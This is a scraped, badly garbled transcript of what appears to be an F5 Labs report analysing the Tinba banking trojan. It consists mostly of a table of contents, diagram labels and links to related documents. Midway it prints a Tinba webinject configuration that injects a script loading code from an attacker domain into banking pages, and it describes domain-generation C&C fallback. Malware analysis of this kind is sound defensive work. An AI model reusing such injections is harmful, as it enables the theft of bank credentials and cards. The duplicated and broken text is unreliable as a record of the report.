Table of Contents 2 - f5.com

Post on 24-Apr-2022

1 views 0 download

Preview:

Click to see full reader
Report this document
SHARE

Transcript of Table of Contents 2 - f5.com

Table of Contents .................................................................................................................... 2

Table of Figures ....................................................................................................................... 2

THE THREAT ............................................................................................................................. 4 Trojans ............................................................................................................................................. 4 Script Injections ................................................................................................................................ 4

SUMMARY OF THE ATTACK ...................................................................................................... 4

MALWARE ANALYSIS DETAILS .................................................................................................. 6 Dropper Infection ............................................................................................................................. 6 Hooking System Functions ................................................................................................................ 6 Autorun Locations ............................................................................................................................ 7 Deployment on Disk ......................................................................................................................... 7 Hooking the Browsers and Lowering Security .................................................................................... 8 Rootkit ............................................................................................................................................. 8

Registry .................................................................................................................................................... 9 Files .......................................................................................................................................................... 9

Communication with C&C ............................................................................................................... 10 Downloading the Webinject Configuration File from the C&C .......................................................... 11 Posting Stolen Data To The Drop Zone............................................................................................. 12 The Configuration File ..................................................................................................................... 12 Configuration File Structure ............................................................................................................ 14 Tinba C&C Panel ............................................................................................................................. 14

MAN IN THE BROWSER INJECTIONS ........................................................................................ 15 Specially Crafted Online Banking Injections ..................................................................................... 15 Generic VBV Grabber ...................................................................................................................... 16 CC+VBV Grabber ............................................................................................................................. 17

ATSEngine Panel .................................................................................................................................... 19 Stolen Credentials ................................................................................................................................. 19

TINBA DETAILS AND DETECTION RATIO ................................................................................... 19 Anti-Virus Scanning Results ............................................................................................................. 19 About F5 Labs ................................................................................................................................. 22

User

Bank

Spam Malware

Code Injection Login Credentials

Drop Zone Transfer Botmaster

The user re ceives spam email and gets

infected with Tinba malware

Tinba steals login credentials and injects malicious

HTML/JavaScript code into the user’s browser. The stolen

information is sent to the C&C server.

The attacker uses the stolen information for various

fraudulent activities such as performing transactions

and selling/ using stolen credit cards.

PROCESS NAME

PROCESS ID

THREAD ID

OPERATION PATH DETAIL

PROCESS NAME

PROCESS ID

OPERATION PATH DETAIL

PROCESS NAME

PROCESS ID

OPERATION PATH DETAIL

PROCESS NAME

PROCESS ID

OPERATION PATH DETAIL

Registry

Files

Figure 5 : The C: \ Documents and Settings \ Administrator \ Application Data \ 557 CEB7B \ folder as seen from IceSword.

The m alware uses a hard - coded algorithm to generate random domains to which it will send DNS queries. This gives the attackers the ability to install a new C&C server if an old one has been taken down by I nternet authorities. This way, the m alware can come back to life without the need to infect the bots with a new binary.

set_url *book* GP set_url *pay* GP data_before

data_before data_end data_end

data_inject data_inject <script> <script> var myComputer = "%BOTID%"; var myComputer = "%BOTID%"; </script> </script> <script <script

src="https://omtorwa.com/vbvgr/src/x.js"></sc src="https://omtorwa.com/vbvgr/src/x.js"></sc

ript> ript> data_end data_end

data_after data_after

</head> </head> data_end data_end

ATSEngine Panel

Stolen Credentials

mailto:info@f5.com
mailto:apacinfo@f5.com
mailto:emeainfo@f5.com
mailto:f5j-info@f5.com

Top related

DALI FAZON® F5 MANUAL · DALI FAZON® F5 MANUAL 2 ENGLISH - DEUTSCH - DANSK FAZON F5 Speaker(s) pr. carton TABLE 1 FIGURE 1 FIGURE 2A FIGURE 2B FIGURE 2C DALI Denmark +45 9672 1155
 Documents
Platform Guide: VIPRION® 2400 - F5 Networkssupport.f5.com/content/kb/en-us/products/big-ip_ltm/manuals/... · • F5-branded40GbEQSFP+transceivermodules(F5-UPG-QSFP+) Note:OnlytheVIPRIONB2250bladeincludes40GbEQSFP+interfaceports.
 Documents
SECURITY TECHTALK THREATS AND MITIGATIONgovernmentvideosolutionsforum.com/pdf/F5-CarahsoftSecurityTechTalk... · 26/04/2013 · n.mistry@f5.com 732-289-5272 SECURITY TECHTALK THREATS
 Documents
ANNUAL REPORT 2015 ANNUAL REPORT - f5.com · F5 achieved a year of solid growth and profitability in fiscal 2015. 1. Revenue growth: F5’s revenue was $1.92 billion for the year,
 Documents
The Evolving Role of CISOs - F5 Networks · The Evolving Role of CISOs and their Importance to the Business f5.com Research sponsored by F5. Independently conducted by Ponemon Institute
 Documents
The New Era of Fraud: An Automated Threat - f5.com
 Documents
Table of Contents - TCL Com
 Documents
BIG-IP Access Policy Manager - f5.com
 Documents
201 TMOS Administration v2 - F5 Networks...F5 STUDY GUIDE 201 TMOS Administration v2 (TMOS Version 11.4) Eric Mitchell Channel SE, East US and Federal F5 Networks June 3, 2016 e.mitchell@f5.com
 Documents
The F5 DDoS Mitigation Reference Architecture - F5 …interact.f5.com/.../ddos-protection-reference-architecture-wp.pdf · Large FSI DDoS Protection Reference Architecture 13 Enterprise
 Documents
F5 EMEA Partner Price List - mosaic451.com · F5 Networks -- Confidential Effective July 1, 2015 Page 2 of 39 BIG-IP URL Filtering Licenses for Policy Enforcement Manager (PEM ...
 Documents
F5 APM - Westconbe.security.westcon.com/documents/47407/6_v11 seminar_SAML.pdf · lw@f5.com 07889 641911 F5 APM & ... ‘SAM-EL’ Enable Simplified Application Access with BIG-IP
 Documents
How Will Com F5 Help ANY Business
 Documents
iControl® REST API User Guide - cdn.f5.comcdn.f5.com/websites/devcentral.f5.com/downloads/icontrol-rest-api-user... · About the iControl REST transaction model ... (F5) ... "
 Documents
F5 VMware Virtual Community Roundtable VMware Alliance Team @ F5 VMwarePartnership@f5.com .
 Documents
Table of Contents 2 - F5 Networks...Author Debbie Walkowski Created Date 20161213213407Z
 Documents
Table Control Com Duplo Click
 Documents
KEB COMBIVERT F5-M/S - download.5117.comdownload.5117.com/data/file/830.pdf · KEB COMBIVERT F5-M/S / KEB COMBIVERT F5-M 1.5KW 315KW resolver / INITIATOR HIPERFACE ENDAT Tacho / PNP/NPN
 Documents
The Perimeter: An Identity Crisis - f5.com · The Perimeter: An Identity Crisis f5.com 7 In any organization, a specific user may have multiple identities for various corporate resources
 Documents
The F5 and Oracle Technology Partnership€¦ · PARTNERSHIP OVERVIEW F5 and Oracle 2 F5 Networks, Inc. Corporate Headquarters info@f5.com F5 Networks, Inc. 401 Elliott Avenue West,
 Documents

Copyright © 2022 FDOCUMENTS